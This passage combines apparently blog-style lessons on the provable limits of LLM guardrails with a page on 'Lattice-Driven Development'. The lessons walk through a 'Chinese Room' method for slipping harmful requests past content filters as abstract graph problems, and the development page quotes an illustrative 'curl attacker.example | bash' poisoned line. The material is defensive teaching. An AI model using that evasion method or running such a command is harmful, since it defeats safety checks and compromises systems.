You might object: "I'll just write a regex that strips filler characters first." But you do not know the filler character. Or the modulus. Or whether the encoding uses MOD-2, MOD-3, or MOD-97. And here is the deeper problem: **the attacker chooses the encoding after seeing your regex. **The space of modular encodings is infinite. Your regex is fixed. Analogy AM radio cannot receive FM signals. Not because the antenna is badly designed — because amplitude demodulation is a fundamentally different process from frequency demodulation. Your regex is AM. Modular-position encoding is FM. Building a better AM radio does not help. You need a different receiver. Key Insight The chain is tight: **Aperiodic monoid → Star-free → AC⁰ → Cannot compute MOD p → Blind to modular encodings. **Each arrow is a proven theorem. The composition is logically watertight. And 97% of production guardrail regexes satisfy the entry condition. Lesson 4 of 6
## Beyond Regex: The Information Theory Wall Fine. Regex is blind to modular encodings. But your production system does not rely on regex alone. You have a neural classifier behind it — a transformer model that is far more powerful than a finite automaton. Does it fix the problem? Partly. Transformers operate in TC^0 (constant-depth circuits *with threshold gates*), which **can** compute MOD p. So the specific regex blind spot does not apply to neural classifiers. But they face a *different* wall. The wall is **information-theoretic**, and it comes from abstraction. In production, your classifier does not see raw user input. It sees an abstracted version: API names, endpoint categories, intent labels. The string "youtube.com/watch?v=xyz" becomes "video_endpoint". The string "evilsite.com/malware.exe" might also become "video_endpoint" if it is served from a media CDN. This abstraction **destroys information**. And Fano's inequality gives an exact lower bound on the classification error that results. Try It — Computing the Fano Error Floor
```
import math

def binary_entropy(p):
    """H(p) = -p*log2(p) - (1-p)*log2(1-p)"""
    if p <= 0 or p >= 1:
        return 0.0
    return -p * math.log2(p) - (1 - p) * math.log2(1 - p)

# Scenario: 30% of requests hit ambiguous abstraction categories
# Within those categories, the safe/unsafe split is 50/50
# Fano's inequality: P_error >= h_inv(H(Y|X_abstracted))

# The conditional entropy from abstraction loss
# 30% of inputs land in categories where the label is a coin flip
cond_entropy = 0.30 * binary_entropy(0.5) + 0.70 * 0.0
# = 0.30 * 1.0 = 0.30 bits of conditional entropy
print(f"Conditional entropy H(Y|X_abs): {cond_entropy:.3f} bits")

# Binary search for the inverse: find p where h(p) = cond_entropy
lo, hi = 0.0, 0.5
for _ in range(100):
    mid = (lo + hi) / 2
    if binary_entropy(mid) < cond_entropy:
        lo = mid
    else:
        hi = mid

print(f"Fano error floor: {lo:.4f}")
# Roughly 0.053: about one in twenty requests will be misclassified,
# no matter how good the model is. The bits are gone.
```
No model, however powerful, beats this floor: the bound is a property of the abstraction, not of the classifier. Lesson 5 of 6
## The Chinese Room Attack
The deepest barrier removes the harmful semantics from the prompt entirely. The attacker keeps a private interpretation table offline and sends your system nothing but an abstract formal problem. Try It — The Attack in Four Steps
```
# STEP 1: Attacker builds an interpretation table (kept OFFLINE).
# This table never touches your system.
interpretation = {
    "R1": "acetylation at 85C for 15 min",
    "R2": "quench in ice water",
    "R7": "vacuum filtration and recrystallization",
}

# STEP 2: Attacker sends a pure graph theory problem
prompt = """
Given this directed graph:
R1: N1 -> N2 (weight: 3)
R2: N2 -> N3 (weight: 2)
R7: N3 -> N17 (weight: 4)
Find the shortest path from N1 to N17.
List the edges traversed and total weight.
"""

# STEP 3: LLM responds (this is a trivial graph problem)
llm_response = """
Shortest path: N1 -> N2 -> N3 -> N17
Edges: R1, R2, R7
Total weight: 3 + 2 + 4 = 9
"""

# STEP 4: Attacker applies interpretation table
print("LLM solved a graph theory problem.")
print("Attacker reads it as:")
print()
for step in ["R1", "R2", "R7"]:
    print(f"  {step}: {interpretation[step]}")

# Output:
# LLM solved a graph theory problem.
# Attacker reads it as:
#
#   R1: acetylation at 85C for 15 min
#   R2: quench in ice water
#   R7: vacuum filtration and recrystallization

# The guardrail saw: a graph theory homework problem.
# The attacker got: a correct synthesis procedure.
# The prompt and a legitimate homework problem are
# THE SAME STRING. Distinguisher advantage: exactly zero.
```
This is not a jailbreak. The LLM was not tricked into doing something it should not do. It solved a graph theory problem correctly. The meaning was never in the prompt. The meaning was in the interpretation table that the attacker holds offline and never sends to the system. The guardrail faces a formally impossible task: **distinguish two identical strings based on the intent of the person who sent them.** Key Insight The Chinese Room attack is not about any specific domain (chemistry, code, etc). It works for *any* knowledge that can be encoded as a formal structure — which is most knowledge. The LLM operates as a pure syntactic engine. The semantics exist only in the attacker's mapping table. Content filtering cannot intercept what was never in the content. Quiz Can you defeat this attack by monitoring the LLM's output instead of the input? **No.** The output is also abstract: "N1 -> N2 -> N3 -> N17, edges R1, R2, R7." This is a valid graph theory answer. The output guardrail faces the same indistinguishability problem. The dangerous semantics exist only in the attacker's offline table, which never touches your system. This is why the paper argues for **execution-layer monitoring** rather than content-layer filtering. You cannot filter what you cannot see. But you *can* monitor what the system actually *does* with the answer (API calls, file access, network requests). Quiz What if we require the LLM to explain its reasoning in natural language? Would that expose the attack? **No.** The LLM would explain it in natural language — as a graph theory problem. "I found the shortest path by following edges R1, R2, and R7, which gives a total weight of 9." Perfectly legitimate. The explanation is as abstract as the solution. The attacker's interpretation table is the only place where R1 = "acetylation at 85C" exists, and it never enters the system. Lesson 6 of 6
## What You Should Actually Do If you have read this far, you might feel like guardrails are pointless. They are not. They are **incomplete**. There is a difference. A lock that can be picked is still worth having — it raises the cost of attack. But you should not rely on it as your only security boundary. Here is the defense map:
| Barrier | What It Means | Engineering Response |
| --- | --- | --- |
| **Regex blind spot** (AC^0 limitation) | Cannot detect modular-position encodings | Keep regex for easy wins (keyword matching). Do not treat it as a security boundary. Supplement with deeper inspection. |
| **Fano error floor** (information loss) | Abstraction destroys bits needed for classification | Inspect closer to raw content. Reduce abstraction layers between input and classifier. Accept that irreducible error exists. |
| **NP-hard verification** (computational) | Verifying whether a prompt encodes harmful content is NP-hard in general | Use heuristics. Accept false negatives. Set time budgets on analysis. Layer multiple imperfect detectors. |
| **Chinese Room** (indistinguishability) | Abstract prompts are identical to legitimate ones | You cannot solve this at the prompt layer. Move defense downstream. |
The Answer: Execution-Layer Monitoring When content-layer filtering has provable limits, you move the defense to where the damage actually happens. Four concrete strategies, ordered by implementation effort: 1. Sandboxing Restrict capabilities regardless of intent. The LLM can solve any graph theory problem it wants — but it cannot make network requests, write files, or execute code outside a sandbox. This is defense that does not require understanding the prompt.
```
# Example: gVisor sandbox for LLM tool execution
# The LLM's response can say anything.
# The sandbox controls what it can DO.
runsc --network=none --rootless \
  python3 execute_llm_tool.py --input response.json
```
2. Network ACLs Block dangerous endpoints at the OS or network level. If the LLM's tool-use chain tries to hit a blocked domain, it fails regardless of how the request was phrased.
```
# iptables rules for LLM execution environment
# Allow only known-safe API endpoints
iptables -A OUTPUT -p tcp -d api.safe-service.com --dport 443 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -j DROP
iptables -A OUTPUT -p tcp --dport 80 -j DROP
```
3. Runtime Payload Inspection Monitor what actually executes, not what was requested. If the LLM generates code, analyze the code. If it makes API calls, inspect the call parameters. This shifts from "is the prompt safe?" (undecidable in general) to "is this specific action safe?" (much more tractable).
```
# Hook into the execution layer
import ast

def execute_tool_call(tool_name, params):
    # Inspect WHAT IS ACTUALLY HAPPENING, not what was asked for
    if tool_name == "run_code":
        ast_tree = ast.parse(params["code"])
        for node in ast.walk(ast_tree):
            if isinstance(node, ast.Import):
                check_import_allowlist(node)
            if isinstance(node, ast.Call):
                check_function_allowlist(node)
    if tool_name == "http_request":
        check_url_allowlist(params["url"])
    # Only proceed if all checks pass
    return sandbox_execute(tool_name, params)
```
4. Provenance Tracking Follow the full pipeline. Log which prompt led to which LLM response, which led to which tool call, which led to which system effect. When something goes wrong, you can trace it. When a pattern emerges, you can detect it across requests.
```
# Structured provenance log
{
  "request_id": "req_8f3a2b",
  "prompt_hash": "sha256:a1b2c3...",
  "llm_response_hash": "sha256:d4e5f6...",
  "tool_calls": [
    {"tool": "run_code", "blocked": false, "imports": ["json", "math"]},
    {"tool": "http_request", "blocked": true, "reason": "url not in allowlist"}
  ],
  "outcome": "partial_execution"
}
```
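Producing entries in that shape takes only a few lines. Here is a minimal sketch (my illustration; `log_request`, the file name, and the hashing scheme are assumptions, not the production system). The two ideas that matter are content-addressing via hashes and an append-only JSONL file:

```python
import hashlib
import json

def log_request(path, prompt, llm_response, tool_calls, outcome):
    """Append one provenance entry per request (append-only = immutable trail)."""
    entry = {
        "request_id": "req_" + hashlib.sha256(prompt.encode()).hexdigest()[:6],
        "prompt_hash": "sha256:" + hashlib.sha256(prompt.encode()).hexdigest(),
        "llm_response_hash": "sha256:" + hashlib.sha256(llm_response.encode()).hexdigest(),
        "tool_calls": tool_calls,
        "outcome": outcome,
    }
    with open(path, "a") as f:  # append-only JSONL, one entry per line
        f.write(json.dumps(entry) + "\n")
    return entry

entry = log_request(
    "provenance.jsonl",
    prompt="Set up the project database",
    llm_response="(generated script)",
    tool_calls=[{"tool": "run_code", "blocked": False}],
    outcome="partial_execution",
)
print(entry["request_id"])
```

Hashing the prompt and response instead of storing them raw keeps the log compact and lets you detect repeated attack patterns across requests without retaining sensitive content.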
Finally, the monoid extractor as a practical audit tool. If you maintain a corpus of guardrail regexes, you can programmatically check which ones are aperiodic (all of them, almost certainly) and understand exactly what class of encodings they are blind to. Audit Your Regex Corpus
```
# Conceptual usage of a monoid extraction tool
# See: github.com/josephrobertlopez/aperiodic-guardrails
from aperiodic_guardrails import analyze_regex

results = analyze_regex(r"(DROP|DELETE|TRUNCATE)\s+TABLE")

print(f"DFA states:  {results.dfa_states}")    # 12
print(f"Monoid size: {results.monoid_size}")   # 47
print(f"Aperiodic:   {results.is_aperiodic}")  # True
print(f"In AC^0:     {results.in_ac0}")        # True
print(f"MOD_p blind: {results.mod_p_blind}")   # True
print()
print("Recommendation:")
print(" This regex is provably blind to modular-position encodings.")
print(" Supplement with execution-layer monitoring.")
print(" Do NOT rely on this as a security boundary.")
```
The Bottom Line Content-layer guardrails are **filters, not firewalls**. They catch the easy stuff. They will always miss some hard stuff, and the miss rate has a mathematical floor. Defense in depth is not a best practice — it is a provable necessity. Move your critical security decisions to the execution layer, where you can observe what the system actually does rather than trying to predict it from what was asked. **Read the full paper and explore the tools:**
[github.com/josephrobertlopez/aperiodic-guardrails ]()
Paper: "Algebraic and Computational Limits of LLM Guardrails" Joey Lopez · 2026 · [jrlopez.dev ]()
[← jrlopez.dev ]()· [deep dive → ]()· [prompting notes → ]()[.md ]()
---
# lattice-dev.md
# https://jrlopez.dev/p/lattice-dev.html
---
title: "Lattice-Driven Development"
description: "Dependency-ordered dev. Build L1 before L2."
author: "Joey Lopez"
date: "2026-03-08"
tags: ["methodology", "code", "theory"]
atom_id: 15
source_html: "lattice-dev.html"
url: "https://jrlopez.dev/p/lattice-dev.html"
generated: true
---
[jrlopez.dev ]()[Pipeline vs Lattice ]()[Spec Folder ]()[Verification ]()[Topo Sort ]()[Security ]()[Formal ]()[Getting Started ]()
# Lattice-Driven Development Why dependency ordering, verification gates, and topological execution beat hope-based AI workflows. Joey Lopez [Why Lattice ]()[Verification ]()[Security ]()Section 01
## Pipeline vs. Lattice I spent years running pipelines. A then B then C. Fast feedback loop. Ship it. Find out what broke in production. Then I hit a wall. One hallucination in step A silently corrupted everything downstream. By the time we caught it at C, the cascade had already spread. Here's how it actually played out:
```
# Real scenario: LLM-assisted data pipeline

# Step A: LLM summarizes customer requirements
requirements = llm("Summarize these 47 emails into requirements")
# Output: "Customer needs OAuth2 support"
# Reality: Customer said "we need OAuth2 OR SAML" -- LLM dropped SAML

# Step B: LLM generates spec from requirements (uses Step A output)
spec = llm(f"Write a spec for: {requirements}")
# Output: Spec with OAuth2 only. No SAML. Looks correct.

# Step C: LLM generates code from spec (uses Step B output)
code = llm(f"Implement this spec: {spec}")
# Output: Working OAuth2 implementation. Tests pass. Ships.

# Week 3: Customer asks "where's SAML?"
# You dig through 47 emails to find the original requirement.
# The hallucination happened at Step A. Everything after was correct
# but built on a lie.
```
The problem: pipelines have zero verification between steps. You only know if something is wrong after execution -- or worse, after deployment. A lattice inverts this. Before C runs, it verifies that its input matches the contract defined by B. Before B runs, it verifies that its input matches A. Each layer is a proof, not a hope. PIPELINE (hope-based):
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ A: Summarize │ ──────→ │ B: Write Spec│ ──────→ │ C: Gen Code │
│ requirements │ │ from summary │ │ from spec │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
LLM drops SAML Spec has no SAML Code has no SAML
(silent error) (looks correct) (tests pass!)
│
Ships to prod
│
Customer: "where's SAML?"
LATTICE (verified):
┌──────────────┐ GATE ┌──────────────┐ GATE ┌──────────────┐
│ A: Summarize │ ──┤✓├──→ │ B: Write Spec│ ──┤✓├──→ │ C: Gen Code │
│ requirements │ │ │ │ from summary │ │ │ │ from spec │
└──────────────┘ │ │ └──────────────┘ │ │ └──────────────┘
│ │ │ │
Check A vs Check B vs KNOWLEDGE:
source emails: "Does spec cover all
"Are all reqs constraints in
present?" KNOWLEDGE.md?"
│
GATE FAILS: "SAML mentioned in
emails but missing from summary"
│
A reruns before B ever starts Warning AI is fast but unreliable. It will confidently generate wrong output. If you run a pipeline, a hallucination becomes a bug in production. If you run a lattice, a hallucination becomes a broken gate that forces a redo. Fail at verification, not at scale. Analogy A pipeline is like a game of telephone -- each person repeats what they heard, and errors compound silently. A lattice is like a relay race with checkpoints -- each runner must show their baton matches what the previous runner handed off before they start running. The game of telephone always drifts. The relay race catches drift at every handoff. That's the core distinction. Pipelines assume each step is correct. Lattices verify it. In a world where your agent is an LLM that hallucinates with confidence, lattices are the only way to stay sane. Quiz In the pipeline example above, would adding unit tests to Step C have caught the SAML omission? **No. **The tests would test the OAuth2 implementation -- which works correctly. The bug isn't in the code, it's in the requirements. Step C's tests verify "does the code match the spec?" The spec itself is wrong. This is why verification gates check each layer against the PREVIOUS layer, not against itself. Self-consistency is not correctness. Section 02
## The Spec Folder A lattice is physical. It lives in a folder. I call it spec/. The spec folder is your ground truth. It contains five files, in dependency order: spec/
├── KNOWLEDGE.md ← Ground truth (human-written, verified once)
├── SPEC.md ← Contract (verified against KNOWLEDGE)
├── PLAN.md ← Execution order (verified against SPEC)
├── OUTPUT/ ← Generated artifacts
└── EXECUTION.log ← Audit trail Each file is a layer in the lattice. Each layer depends on the previous one. This creates a directed acyclic graph (DAG).
| File | Purpose | Written By | Verified By |
| --- | --- | --- | --- |
| **KNOWLEDGE.md** | Immutable facts. What is true about the domain, prior art, constraints, invariants. | Human | Human code review |
| **SPEC.md** | Contract. What the system will do. Acceptance criteria. Interface definitions. | LLM + Human | Human + KNOWLEDGE check |
| **PLAN.md** | Execution roadmap. Decomposed tasks. Dependency graph. Build order. | LLM + Human | Human + SPEC check |
| **OUTPUT/** | Generated files. Code, configs, docs. One per task. | LLM | Human + PLAN check |
| **EXECUTION.log** | Audit trail. Who did what, when, and why. | System | N/A (immutable) |
Core Insight **KNOWLEDGE.md is the ground truth. **Human-written, human-verified, never auto-generated. Everything downstream is checked against it. If KNOWLEDGE is solid, SPEC and PLAN can be verified mechanically. If KNOWLEDGE drifts, everything breaks. Abstractions are useless without examples. Here's what each file actually looks like for a real project -- building a CLI tool that converts CSV files to JSON. KNOWLEDGE.md -- What Is True
```
# Domain Knowledge: CSV-to-JSON CLI
## Constraints
- Input: CSV files, UTF-8 encoded, max 500MB
- Output: JSON array of objects (one per row)
- Headers become keys. No duplicate headers allowed.
- Empty cells become null, not empty string.
- Must handle quoted fields with commas inside them (RFC 4180).
## Prior Art
- Python csv module handles RFC 4180 correctly.
- jq exists but requires JSON input (not CSV).
- csvkit exists but pulls 12 transitive dependencies.
## Invariants
- Row count in output JSON == row count in CSV (minus header).
- Key set of every JSON object == header set of CSV.
- Round-trip: csv -> json -> csv must preserve data (no silent drops).
```
SPEC.md -- What the System Will Do
```
# Spec: csv2json CLI
## Verified Against: KNOWLEDGE.md (signed off 2026-03-15)
## Interface
csv2json input.csv [-o output.json] [--pretty] [--strict]
## Acceptance Criteria
1. Reads CSV from stdin or file argument.
2. Outputs JSON array to stdout or -o file.
3. --strict mode: reject files with duplicate headers (exit 1).
4. --pretty mode: indent JSON with 2 spaces.
5. Empty cells -> JSON null. (KNOWLEDGE: "not empty string")
6. Handles RFC 4180 quoted fields. (KNOWLEDGE: "must handle")
7. Memory: streaming parse, never load full file into RAM.
## Error Contracts
- Duplicate headers + --strict: exit 1, stderr message.
- Malformed CSV (unclosed quote): exit 2, stderr with line number.
- File not found: exit 3.
```
PLAN.md -- How to Build It
```
# Plan: csv2json CLI
## Verified Against: SPEC.md (signed off 2026-03-15)
TASK 1: Argument parser
Prerequisites: (none)
Deliverable: cli.py with argparse setup
Verify: --help prints usage matching SPEC interface
TASK 2: Streaming CSV reader
Prerequisites: TASK 1
Deliverable: reader.py using csv.reader()
Verify: handles RFC 4180 (SPEC item 6), never loads full file (SPEC item 7)
TASK 3: JSON emitter
Prerequisites: TASK 2
Deliverable: emitter.py, streams JSON array
Verify: null for empty cells (SPEC item 5), --pretty works (SPEC item 4)
TASK 4: Strict mode + error handling
Prerequisites: TASK 2
Deliverable: validators.py
Verify: exit codes match SPEC error contracts
TASK 5: Integration test
Prerequisites: TASK 3, TASK 4
Deliverable: test_csv2json.py
Verify: round-trip invariant (KNOWLEDGE: "csv -> json -> csv")
Topological sort: 1 -> 2 -> (3, 4 in parallel) -> 5
```
Analogy KNOWLEDGE is the foundation. SPEC is the blueprint. PLAN is the construction schedule. You would never pour concrete before the blueprint is signed off. You would never schedule electricians before knowing where the walls go. The lattice enforces this same discipline for software -- each layer locks before the next one starts. Quiz In the PLAN above, why can Tasks 3 and 4 run in parallel? **Because they share the same prerequisite (Task 2) but don't depend on each other. **The JSON emitter and the validators both need the CSV reader to exist, but neither needs the other. This is visible in the dependency graph -- they sit at the same depth in the DAG. Topological sort identifies this automatically. In practice, this means two LLM agents (or two developers) can work on them simultaneously without coordination. Section 03
## Verification Gates Each layer has a verification gate. A gate is a test: "Does this layer comply with the contract defined by the previous layer?" I don't do elaborate formal verification. I do manual spot-checks. But they're systematic:
- **KNOWLEDGE gate: **Human reads it once. Is it factual? Is it complete? Sign off.
- **SPEC gate: **Human + automated check. Does SPEC satisfy all constraints in KNOWLEDGE? No contradictions? Sign off.
- **PLAN gate: **Human + automated check. Does PLAN cover all tasks in SPEC? Is the dependency graph acyclic? Can it execute top-to-bottom? Sign off.
- **OUTPUT gate: **Human + automated check. Do the generated files match PLAN? Do they work? Can they be integrated? Sign off. KNOWLEDGE.md
│
├── GATE 1: Human review + sign-off
│ Questions:
│ - Are all domain facts cited or sourced?
│ - Are constraints complete? (Ask: "what could go wrong?")
│ - Are invariants testable? (If not, rewrite them.)
│
↓ ✓ KNOWLEDGE verified ──────────────────────────────────
│
SPEC.md
│
├── GATE 2: Human + constraint check
│ For EACH constraint in KNOWLEDGE:
│ - Is there a corresponding acceptance criterion in SPEC?
│ - Does the criterion satisfy the constraint? (not just mention it)
│ For EACH acceptance criterion in SPEC:
│ - Does it trace back to a KNOWLEDGE constraint?
│ - Orphan criteria = scope creep. Flag or justify.
│
↓ ✓ SPEC verified against KNOWLEDGE ─────────────────────
│
PLAN.md
│
├── GATE 3: Human + DAG check
│ - Every SPEC criterion maps to at least one PLAN task
│ - Dependency graph is acyclic (topo sort succeeds)
│ - No task has unresolvable prerequisites
│ - Parallel tasks are truly independent
│
↓ ✓ PLAN verified against SPEC ──────────────────────────
│
OUTPUT/
│
├── GATE 4: Human + integration test
│ - Each output file traces to a PLAN task
│ - Tests pass for each task's verify criteria
│ - Integration test: outputs compose correctly
│
↓ ✓ OUTPUT verified against PLAN ────────────────────────
│
EXECUTION.log (immutable audit trail) Here's what a gate check actually looks like in practice. This is the SPEC gate for our csv2json example:
```
# GATE 2 CHECK: SPEC.md vs KNOWLEDGE.md
# Run this mentally or with an LLM as verifier

# KNOWLEDGE constraint: "Empty cells become null, not empty string"
# SPEC criterion 5: "Empty cells -> JSON null"
# VERDICT: ✓ Satisfied

# KNOWLEDGE constraint: "Must handle quoted fields (RFC 4180)"
# SPEC criterion 6: "Handles RFC 4180 quoted fields"
# VERDICT: ✓ Satisfied

# KNOWLEDGE constraint: "No duplicate headers allowed"
# SPEC criterion 3: "--strict mode: reject duplicate headers"
# VERDICT: ⚠ Partial -- what happens WITHOUT --strict?
# Action: Add to SPEC: "Default mode: last value wins for dupes, warn to stderr"

# KNOWLEDGE constraint: "Round-trip: csv -> json -> csv must preserve data"
# SPEC criterion: ... MISSING
# VERDICT: ✗ Gap found. Add round-trip acceptance criterion to SPEC.

# GATE RESULT: BLOCKED -- 2 issues must be resolved before PLAN starts
```
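The same check can be automated. A minimal sketch (my illustration; the keyword table and `gate2` are hypothetical, not LDD tooling) that flags KNOWLEDGE constraints with no covering SPEC criterion:

```python
# KNOWLEDGE constraints mapped to keywords we expect to find in SPEC criteria
knowledge_constraints = {
    "empty cells become null": ["null"],
    "RFC 4180 quoted fields": ["rfc 4180"],
    "no duplicate headers": ["duplicate headers"],
    "round-trip preserves data": ["round-trip"],
}

# The SPEC as drafted (round-trip criterion missing, as the gate found)
spec_criteria = [
    "Empty cells -> JSON null",
    "Handles RFC 4180 quoted fields",
    "--strict mode: reject duplicate headers",
]

def gate2(constraints, criteria):
    """Return KNOWLEDGE constraints with no covering SPEC criterion."""
    text = " ".join(criteria).lower()
    return [c for c, keys in constraints.items()
            if not any(k in text for k in keys)]

gaps = gate2(knowledge_constraints, spec_criteria)
for g in gaps:
    print(f"GAP: no SPEC criterion covers '{g}'")
print("GATE:", "BLOCKED" if gaps else "PASS")
# GAP: no SPEC criterion covers 'round-trip preserves data'
# GATE: BLOCKED
```

Keyword matching is crude (an LLM verifier catches the "Partial" cases that keywords cannot), but even this crude version makes the gate blocking instead of optional.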
Core Insight The gate found two problems *before any code was written *. In a pipeline, these would surface as bugs during testing (the partial case) or as customer complaints (the missing round-trip). The gate cost: 10 minutes of checking. The pipeline cost: hours of debugging and rewriting. Try It Take your current project. Can you draw the dependency graph? Can you list the verification gates? If you can't write down what each gate checks, you don't have a lattice -- you have a pile. Start by writing the gate questions, even if the answers are "I don't know yet." Quiz A SPEC criterion says "the system shall be fast." Does this pass Gate 2? **No. **"Fast" is not verifiable. It doesn't trace to a testable KNOWLEDGE constraint. A passing criterion would be: "Response time under 200ms for files up to 100MB" -- which traces to a KNOWLEDGE constraint like "Input files max 500MB" and gives you a concrete number to test against. If you can't write a test for a criterion, the criterion is too vague. Rewrite it until you can. The gates don't need to be fancy. A checklist in Markdown is enough. What matters is that each gate is *explicit *and *blocking *. You know what you're checking for, and you do not proceed until the gate passes. Section 04
## Topological Execution Once the dependency graph is defined, the execution order is determined. This is topological sort -- the same algorithm behind make, webpack, apt install, and every build system you've ever used. You define the graph. The algorithm figures out what to build first, what can run in parallel, and what must wait. Dependency graph for csv2json (from PLAN.md):
┌─────────────┐
│ T1: argparse │
│ prereqs: - │
└──────┬────────┘
│
┌──────▼────────┐
│ T2: CSV reader │
│ prereqs: T1 │
└──────┬────────┘
│
┌───────┴────────┐
│ │
┌─────▼───────┐ ┌────▼──────────┐
│ T3: JSON │ │ T4: Validators │
│ emitter │ │ + error codes │
│ prereqs: T2 │ │ prereqs: T2 │
└─────┬───────┘ └────┬──────────┘
│ │
└───────┬────────┘
│
┌──────▼────────┐
│ T5: Integration│
│ test │
│ prereqs: T3,T4 │
└───────────────┘
Topological sort yields: T1 → T2 → {T3, T4} → T5
^^^^^^^^
parallel! Here's how you actually compute this. It's 20 lines of Python:
```
# Topological sort from a PLAN.md dependency graph
from collections import defaultdict, deque

def topo_sort(tasks):
    """Given {task: [prerequisites]}, return execution order with parallel groups."""
    in_degree = {t: len(deps) for t, deps in tasks.items()}
    dependents = defaultdict(list)
    for t, deps in tasks.items():
        for d in deps:
            dependents[d].append(t)
    queue = deque(t for t, deg in in_degree.items() if deg == 0)
    order = []
    while queue:
        # Everything in queue RIGHT NOW can run in parallel
        parallel_group = sorted(queue)
        queue.clear()
        order.append(parallel_group)
        for t in parallel_group:
            for dep in dependents[t]:
                in_degree[dep] -= 1
                if in_degree[dep] == 0:
                    queue.append(dep)
    return order

# csv2json PLAN.md as a dependency graph
plan = {
    "T1_argparse": [],
    "T2_csv_reader": ["T1_argparse"],
    "T3_json_emitter": ["T2_csv_reader"],
    "T4_validators": ["T2_csv_reader"],
    "T5_integration": ["T3_json_emitter", "T4_validators"],
}

for i, group in enumerate(topo_sort(plan)):
    status = "(parallel)" if len(group) > 1 else ""
    print(f"  Step {i+1}: {', '.join(group)} {status}")

# Output:
# Step 1: T1_argparse
# Step 2: T2_csv_reader
# Step 3: T3_json_emitter, T4_validators (parallel)
# Step 4: T5_integration
```
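The flip side: when the graph has a cycle, Kahn's algorithm stalls with tasks left over. A minimal sketch (my illustration, using the same task-dict shape) that reports which tasks can never be scheduled:

```python
from collections import deque

def find_cycle(tasks):
    """Return tasks that can never be scheduled: the cycle plus everything downstream."""
    in_degree = {t: len(deps) for t, deps in tasks.items()}
    dependents = {t: [] for t in tasks}
    for t, deps in tasks.items():
        for d in deps:
            dependents[d].append(t)
    queue = deque(t for t, deg in in_degree.items() if deg == 0)
    while queue:
        t = queue.popleft()
        for dep in dependents[t]:
            in_degree[dep] -= 1
            if in_degree[dep] == 0:
                queue.append(dep)
    # Anything still waiting on a prerequisite is trapped
    return {t for t, deg in in_degree.items() if deg > 0}

# A broken PLAN: T2 and T3 depend on each other
bad_plan = {"T1": [], "T2": ["T1", "T3"], "T3": ["T2"], "T4": ["T3"]}
trapped = find_cycle(bad_plan)
print(f"Unschedulable tasks: {sorted(trapped)}")
# Unschedulable tasks: ['T2', 'T3', 'T4'] -- T4 is not in the cycle,
# but it is starved by it. One cycle poisons everything downstream.
```

Running this check at PLAN time is exactly the Gate 3 "DAG is acyclic" test: the error surfaces before any task executes.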
Core Insight The dependency graph determines the build order. You don't manually schedule tasks -- you declare prerequisites, and the algorithm handles sequencing and parallelism. The same principle that makes makereliable makes LDD reliable. And when you add a new task, the sort automatically recomputes -- you never manually reshuffle. Warning If your dependency graph has a cycle, topological sort fails. This is a feature, not a bug. A cycle means "A depends on B which depends on A" -- an impossible requirement. In a pipeline, you'd discover this at runtime when two tasks deadlock. In a lattice, you discover it when you try to compute the sort, before any work starts. If your PLAN has a cycle, your PLAN is wrong. Quiz You have 4 tasks. T1 has no prereqs. T2 depends on T1. T3 depends on T1. T4 depends on T2. What's the maximum parallelism? **2 tasks in parallel. **T1 runs first (only task with no prereqs). Then T2 and T3 can run simultaneously (both depend only on T1, which is done). Then T4 runs (depends on T2). The schedule is: T1 -> {T2, T3} -> T4. Three steps total, with step 2 using two parallel workers. If you had said "T1 -> T2 -> T3 -> T4" you'd be correct but slow -- the lattice reveals the parallelism that a linear schedule hides. This matters because it eliminates scheduling mistakes. If you forget that Task 4 depends on Task 3, you'll discover it when the topo sort puts them in the wrong order -- and the verification gate catches the broken input. The error surfaces at design time, not at runtime. Section 05
## No Execution Path Here's where LDD gets strange and powerful: the LLM never gets direct access to the shell. In a typical workflow, you write a prompt, the LLM generates a bash script, and you run it. If the prompt is malicious or compromised, the LLM can execute arbitrary code. Here's how that looks:
```
# Pipeline workflow: prompt -> code -> execute (no human gate)
user_request = "Set up the project database"

# LLM generates a setup script
llm_output = llm(f"Write a bash script to: {user_request}")

# What you expected:
#   createdb myproject && psql myproject < schema.sql
# What you got: the same setup commands plus one poisoned line
# (illustrative): curl -s http://attacker.example/x.sh | bash
# In a pipeline, that script runs. The payload executes.

# Lattice workflow: prompt -> file -> human review -> execute
# LLM writes to OUTPUT/setup_db.sh (a FILE, not a command)
# Human reads it, sees the curl line, deletes it.
# Human runs the clean version manually.
# The malicious payload never executed.

# Even better: PLAN.md said "Task: create database"
# Gate 4 checks: "Does setup_db.sh do only what PLAN says?"
# Answer: No -- it has an unauthorized curl command.
# Gate BLOCKS. Human investigates. Threat neutralized.
```
| Property | Shell Script Workflow | Lattice Workflow |
| --- | --- | --- |
| **No escalation path** | LLM → bash → system. Escalation is immediate. | LLM → file → human review → execution. Human is the escalation gate. |
| **Built-in audit trail** | History is implicit. What ran? No clear record. | Every file, every gate, every execution is logged in EXECUTION.log. Full provenance. |
| **Blast radius** | One bad script = system compromise. Radius = unbounded. | One bad file = one human-reviewable decision. Radius = the scope of that one decision. |
| **Execution inversion** | LLM decides what runs. Human trusts the LLM. | Human decides what runs. LLM proposes, human disposes. |
Warning Regex-based guardrails can't stop certain attack classes. The answer isn't better filters. It's separating declaration from execution. If the LLM can't execute, it can't cause harm. Read [guardrails-engineers.html ]()for the full argument. This is why I call it "no execution path." The LLM proposes, but it never executes. The human is always in the loop. Section 06
## Formal Foundations LDD isn't just engineering intuition. It maps onto three well-established formal frameworks. You don't need to know the math to use LDD, but understanding why it works helps you extend it. **Design by contract (Meyer, 1986). **Each spec file is a contract with preconditions, postconditions, and invariants. KNOWLEDGE defines invariants. SPEC defines pre/post conditions. PLAN satisfies the contract. This is not metaphorical -- it's the same structure Eiffel and Ada use for software correctness.
```
# Design by contract, applied to spec layers

# KNOWLEDGE.md defines the INVARIANT:
#   "Row count in JSON == row count in CSV minus header"

# SPEC.md defines the CONTRACT:
#   Precondition:  input is valid UTF-8 CSV
#   Postcondition: output is valid JSON array
#   Invariant:     len(json_array) == csv_rows - 1

# PLAN.md SATISFIES the contract:
#   Task 2 ensures precondition  (CSV reader validates UTF-8)
#   Task 3 ensures postcondition (JSON emitter writes valid array)
#   Task 5 ensures invariant     (integration test checks row counts)

# If any task violates the contract, its gate BLOCKS.
# The contract is checkable because it's explicit.
```
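The invariant is directly executable. A minimal sketch (my illustration; `csv_to_json` here is a toy stand-in, not the real csv2json) that converts a small file and then asserts the KNOWLEDGE invariants as the contract check:

```python
import csv
import io
import json

def csv_to_json(csv_text):
    """Toy converter: headers become keys, empty cells become None."""
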